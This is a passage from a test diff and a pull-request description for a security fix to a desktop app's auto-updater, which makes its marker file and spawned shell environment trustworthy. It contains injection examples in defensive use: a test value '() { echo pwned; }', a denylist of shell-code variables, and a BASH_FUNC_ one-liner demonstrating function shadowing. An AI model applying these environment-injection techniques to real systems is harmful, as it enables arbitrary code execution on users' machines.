+  // Not shell-interpreted, but an interpreter reads code from it: Python's
+  // user-site dir comes from HOME, so a planted sitecustomize.py runs on every
+  // `python` start.
+  "HOME",
+];
+
+test("managed command env is CONSTRUCTED: nothing the shell reads as code is inherited", async (t) => {
+  // A narrowed PATH stops a planted shim shadowing a command NAME. These go
+  // further: an exported shell function shadows the name outright, PS4 under
+  // SHELLOPTS=xtrace runs a command substitution before the command does, and
+  // the loader family makes even a trusted absolute binary load planted code.
+  // Because the env is built by naming what is ALLOWED, this also covers the
+  // names nobody has thought of yet.
+  const saved = new Map(SHELL_CODE_VARS.map((k) => [k, process.env[k]]));
+  for (const k of SHELL_CODE_VARS) process.env[k] = "() { echo pwned; }";
+  const savedProbe = process.env.KC_TEST_UNLISTED_PROBE;
+  const savedLang = process.env.LANG;
+  process.env.KC_TEST_UNLISTED_PROBE = "an-unlisted-variable";
+  process.env.LANG = "C.UTF-8";
+  t.after(() => {
+    for (const [k, v] of saved) {
+      if (v === undefined) delete process.env[k];
+      else process.env[k] = v;
+    }
+    if (savedProbe === undefined) delete process.env.KC_TEST_UNLISTED_PROBE;
+    else process.env.KC_TEST_UNLISTED_PROBE = savedProbe;
+    if (savedLang === undefined) delete process.env.LANG;
+    else process.env.LANG = savedLang;
+  });
+  const { deps } = makeDeps({
+    externallyManaged: { managedBy: "m", updateCommand: "/usr/bin/apply", checkCommand: "/usr/bin/check" },
+  });
+  const { optsList, restore } = stubSpawn({ code: 0, out: "0.5.0.5" });
+  t.after(restore);
+  const u = initAutoUpdate(deps);
+  await u.check();
+  assert.strictEqual(optsList.length, 1, "the check shelled exactly one command");
+  const env = optsList[0].env;
+  for (const k of SHELL_CODE_VARS) {
+    assert.ok(!(k in env), `${k} must not reach the managed command`);
+  }
+  assert.ok(!Object.keys(env).some((k) => k.startsWith("BASH_FUNC_")),
+    "no exported shell function may survive");
+  // Constructed, not filtered: an UNLISTED variable is absent because it was
+  // never copied. This is the assertion that holds against the next name.
+  assert.ok(!("KC_TEST_UNLISTED_PROBE" in env),
+    "an unlisted variable must be absent by construction, not by denylist");
+  // The declared pass-through still arrives, or a packager's updater breaks.
+  assert.strictEqual(env.LANG, "C.UTF-8", "declared pass-through vars must survive");
+  // The rest of the hardened environment is unchanged.
+  assert.ok(env.PATH && !env.PATH.includes(require("node:os").homedir()),
+    "PATH stays the narrowed system one");
+  assert.strictEqual(optsList[0].cwd, "/");
 });
 
 // ---------------------------------------------------------------------------


### PR DESCRIPTION
## Problem / Motivation

The `EXTERNALLY-MANAGED` marker is an execution trust root, and nothing verified its provenance.

In `website/electron/auto-update.js`, `readMarkerAt()` accepted the marker with only `st.isFile()` and an 8KiB size cap — no ownership check, no mode check — and `readExternallyManaged()` additionally honoured the `KIROCREW_EXTERNALLY_MANAGED` env var pointing at an arbitrary path, with no dev/test gating. `runManagedCommand()` then executes the marker's `checkCommand` / `updateCommand` string verbatim via `cp.spawn(command, { shell: true })`.

That path needs no user interaction: `managedLaunchTimer` fires `managedCheck()` 30s after launch and `managedPollTimer` re-fires it every `CHECK_INTERVAL_MS` (4h). `checkCommand` alone is sufficient for code execution — the auto-download preference gates only the apply step, not the check.

So a single local file write to `<resourcesPath>/EXTERNALLY-MANAGED`, or one env var set in the app's launch environment, was arbitrary shell execution in the desktop app's context on every launch.

## Why it matters

**Threat model.** The attacker is a prompt-injected agent shell running as the user — explicitly in scope for this project — not a privileged local attacker. Both primitives sit inside that model:

- `<resourcesPath>` is **user-owned** on Homebrew, `pip --user`, and `~/Applications` installs. One `writeFileSync` is enough.
- The launch environment is user-writable on every platform: shell profile, launchd plist, `.desktop` file.

Neither requires escalation, and the payload is chosen entirely by the attacker. The existing narrowed PATH and `cwd="/"` hardening defends against **shimming a trusted command NAME**; it does nothing when the attacker supplies the whole command string.

## What changed (motivation → approach → change)

Root cause: the marker's integrity was never established, and the code said so explicitly — *"we do not lean on the marker's integrity: we HARDEN EXECUTION instead"*. Hardening the environment cannot substitute for verifying the source of a string you hand to a shell. So the fix establishes provenance, and the environment hardening is rebuilt into a shape that cannot be enumerated around.

### 1. The marker file — provenance, not permissions

`canRewriteMarker()` refuses the metadata unless neither the marker **nor its directory** is (a) owned by this euid, (b) group- or world-writable, or (c) writable per `access(W_OK)`. The body is parsed only on that verdict, and the gate runs *before* `JSON.parse`, so no attacker-chosen string ever reaches the fields.

Those three arms are **one predicate** — *can this process cause the marker's content to change* — not layered mitigations, and each closes a hole the previous revision had:

| Revision | Probe | Bypass |
| --- | --- | --- |
| 1 | `access(W_OK)` only | the owner can `chmod +w` back, so read-only-right-now is not provenance |
| 2 | ownership + mode bits only | mode bits do not model ACLs: a root-owned 0755 dir with a macOS `chmod +a` entry for this user reads safe |
| 3 (this) | union of all three | — |

A rewritable marker still means **MANAGED** — the updater stays off, the feed is never contacted. It just yields no metadata, which is the pre-existing bare-marker shape. That also closes the background path **structurally**: with the commands empty, the managed branch takes its existing bare-marker early return, so `managedLaunchTimer` and `managedPollTimer` are never created.

**Windows is fail-closed by declaration.** No POSIX owner to read, and `access(W_OK)` does not model ACLs there, so no honest verdict exists. Rather than let a probe that cannot work decide by accident, the `win32` branch returns "rewritable" before any stat, with a doc paragraph and a test pinning it. A Windows marker is always bare.

### 2. The env var

`KIROCREW_EXTERNALLY_MANAGED` is honoured only when the app is **not packaged**. `isPackaged` resolves lazily from `electron.app`: a runtime with no `electron.app` is by definition not the packaged desktop app, which is exactly when the harness seam is legitimate.

### 3. The spawned environment — constructed, not filtered

Three review rounds each found the next name to strip: `LD_PRELOAD`/`DYLD_INSERT_LIBRARIES`/`NODE_OPTIONS`, then `SHELLOPTS`/`PS4`, then `BASH_FUNC_*`. That is what a denylist over an open-ended namespace does. `shell: true` means a shell interprets the command and a shell reads its environment as code — the loader family, the interpreter family, the startup files, the tracing pair, word splitting, and exported shell **functions**, which shadow a command name outright and so beat `managedPath()` rather than evading it. The namespace differs by shell and by version (`BASH_FUNC_x%%` on bash 4.3+, `BASH_FUNC_x()` on the patched 4.2), so no enumeration of it is provably complete.

`managedEnv()` now **names what the child gets**: `PATH` (narrowed), plus identity/locale/temp/proxy pass-throughs, plus what `cmd.exe` needs to start on the win32 lane. An unlisted variable is absent because it was never copied, so every present *and future* injection variable is already handled and there is no list to keep current. This **replaces** the 18-entry enumeration and its cross-language parity test, so the diff gets smaller.

### 4. The same gap in the gateway

`_trusted_path_env` in `src/kiro_crew/platform/update_provider.py` runs `[<trusted sh>, "-c", cmd]`, so it carried the same exported-shell-function gap. Its environment pass-through is **deliberate and documented** — an operator's package manager needs its proxy, locale and credential-helper variables — so it keeps its denylist shape and only that gap is closed, by matching the `BASH_FUNC_` **prefix** rather than exact names so neither version's form can be missed. Converting it to an allowlist would reverse a documented design decision in code this PR is not about.

### Scope decisions

**A new probe instead of reusing `isBundleContainerWritable` / `isAppImageContainerWritable`.** Those measure the install **container** — the directory holding the `.app` or the AppImage — not the marker's own directory, and the container is neither necessary nor sufficient for this attack. A root-owned `/opt/kirocrew` with a world-writable `resources/` would pass the container check while the attack still worked; conversely `/Applications` is admin-group-writable by default on macOS, so it would refuse the marker on essentially every macOS install.

**Declined:** converting the gateway's `_trusted_path_env` to a constructed env as well. Same reasoning as above — documented deliberate pass-through, pre-existing code, real breakage risk for operator package managers.

**Behaviour change for packagers.** A marker in a user-owned resources directory no longer drives managed auto-update, no marker on Windows does, and the commands run with a constructed environment rather than the app's own. All three degrade to managed-with-no-metadata or a smaller environment, never to self-updating, so no install is left fighting its package manager. A packager that wants the managed commands honoured must install the resources directory root-owned, and set any other variable its updater needs inside its own command. Documented in `docs/build/desktop-app.md`.

## Tests

All new tests execute the **real** probe against real filesystem objects. A test that greps the source for a call would execute zero lines of the new code.

| Test | What it locks in |
| --- | --- |
| `a marker in a USER-WRITABLE dir yields NO metadata` | the base attack: a real tmpdir marker with commands is reduced to the bare-marker shape |
| `chmod 0400 on an OWNED marker does not buy trust` | revision 1's bypass: a `0400` file in a `0500` dir we own is still refused |
| `an ACL-granted write is rewritable even at a safe mode` | revision 2's bypass: the `access(W_OK)` arm is present and does not over-refuse |
| `a marker we do NOT own and cannot chmod is trusted` | the positive half, against a real foreign-owned path — without it the gate could refuse everything and pass every negative test |
| `ownership is what is probed, not the mode bits` | every owner-settable mode (`0600`, `0400`, `0000`) still answers "rewritable"; an absent marker too |
| `Windows is fail-closed by declaration` | the `win32` branch returns before any stat, asserted as a declared property |
| `a PACKAGED app ignores KIROCREW_EXTERNALLY_MANAGED` | env seam off when packaged, still on when not |
| `a rewritable marker never arms the background check` | end-to-end: `disabled === "externally-managed"`, no `setTimeout`/`setInterval`, zero commands shelled across `check`/`download`/`install` |
| `managed command env is CONSTRUCTED` | 24 shell-code vars absent, **plus an UNLISTED probe variable** so the assertion holds against the next name, plus a declared pass-through that must survive |
| `TestShellCodeEnvStripping` (Python, 2 tests) | the gateway drops both `BASH_FUNC_` forms and the tracing pair, while keeping its documented pass-through |

The ownership tests skip as root (root can chmod and rewrite anything, so the probe correctly answers "rewritable" and there is nothing to assert); the trusted-path test resolves its subject from the filesystem and asserts only when its own precondition holds. `stubSpawn` records spawn **options** so the environment is assertable, not just the command.

**Revert-verification** — every superseded shape restored verbatim, per round:

| Guard mutated out | Caught by |
| --- | --- |
| ownership probe → revision 1's `access(W_OK)`-only probe | chmod-0400-owned-marker, windows-fail-closed |
| ownership probe removed entirely | 5 tests |
| owned-file arm only (dir ownership unchecked) | 4 tests |
| ACL arm (`access(W_OK)`) removed | ACL-granted-write |
| `win32` declared fail-closed branch | windows-fail-closed |
| integrity gate call site | 3 tests |
| env-var packaging gate | packaged-app-ignores-env-var |
| constructed env → revision 3's full 18-entry denylist | env-is-CONSTRUCTED |
| constructed env → inherit everything, no filtering | env-is-CONSTRUCTED |
| pass-through list emptied (over-refusal guard) | env-is-CONSTRUCTED |
| gateway `BASH_FUNC_` prefix strip | `TestShellCodeEnvStripping` |

Every mutation is caught; restored, the suite is green. The rows restoring a *previous revision's* probe are the important ones — they prove each reviewed bypass is closed by a test rather than by prose.

## Manual verification

The `BASH_FUNC_` mechanism was confirmed on the dev host rather than assumed: `env 'BASH_FUNC_pkgtool()=() { echo IMPORTED; }' bash -c 'pkgtool'` prints `IMPORTED` (bash 4.2.46, Red Hat patch form; bash 4.3+ uses the `%%` suffix), and the same holds through `sh -c` where `/bin/sh` is bash. `SHELLOPTS=xtrace` with a command-substituting `PS4` likewise executes through both. Otherwise N/A — no user-visible surface changes, and both branches of the guard are exercised against a real filesystem by the tests above.

## Gate status

Rebased onto `origin/main` at `18aef5166`, single commit, no conflicts.

- `website/electron`: `node --test test/*.test.js mochi/test/*.test.js crew-companion/test/*.test.js` → **1560 passed / 0 failed / 1 skipped**; `auto-update.test.js` alone **143/143**.
- Backend: `test_update_provider.py` **92 passed**; with the mirror guards that read `auto-update.js` (`test_windows_signing_contract`, `test_publish_feed_contract`, `test_nightly_version_contract`, `test_update_channel_and_restart`, `test_diagnostics`, `test_dashboard_handlers_core_coverage`) → **396 passed**.
- `black --check`, `isort`, `flake8`, `mypy` (1266 files) and the `check_black_formatting` diff gate all clean.
- Diff-scoped gates run with an explicit base ref (they report a false green without one): `check_brand_name` ✓, `check_focus_cue` ✓, `check_changelog_history` ✓, `check_harness_parity` ✓. Plus `check_testpaths_coverage`, `check_subprocess_encoding`, `check_sync_io_in_async`, `check_lockdown_before_publish`, `check_loop_bound_locks`, `docs-lint.sh` ✓.
- `scrub-lint.sh` reports two hits in `test/test_atomic_write_named_duplicates.py`, which this PR does not touch — reproduced on a clean `origin/main` worktree, so inherited, not introduced here. CI's own De-Amazon Scrub Lint passes on this diff.
- `website/src` is untouched and `eslint.config.js` scopes lint to `src/**/*.{ts,tsx}`, so no frontend lint or vitest surface is affected.

## Related Issues

Post-merge patrol findings on PRs #5752 and #5806.

no linked issue: these are post-merge security-patrol findings, tracked on the PRs above rather than as issues.

## Pattern harvest

Rule candidate: semgrep — `child_process.spawn`/`exec` with `shell: true` where the command argument derives from a file read or `process.env`, flagged unless the read is guarded by a provenance check.

Pattern: two distinct defects share one root shape here, and both are about answering a *different question* than the one the trust decision asks.

First, a local file or env var read as configuration but later handed to a shell is an execution trust root, and it needs a **provenance** check on the write primitive — not a current-permissions check. Mode bits and `access()` are mutable by their owner and blind to ACLs respectively, so each alone answers "is it writable this instant" when the question is "who does this belong to". The tell is a code comment that admits the source is untrusted and then executes it anyway.

Second, when the hostile input is a **namespace** rather than a value — environment variables a shell interprets, and especially `BASH_FUNC_*` whose member names are unbounded — a denylist cannot converge, and successive review rounds finding "one more name" is the diagnostic, not a series of separate bugs. The fix is to invert to a constructed allowlist so absence is the default. Three rounds on the same span is the signal to change shape rather than add an entry.

## Checklist

- [x] At most two commits (one is the norm), with a Conventional Commits title
- [x] Existing tests pass and new tests added for new functionality
- [x] Self-review completed; code follows project style guidelines
- [x] Documentation updated (if applicable)
- [x] No secrets, credentials, or internal references in the diff
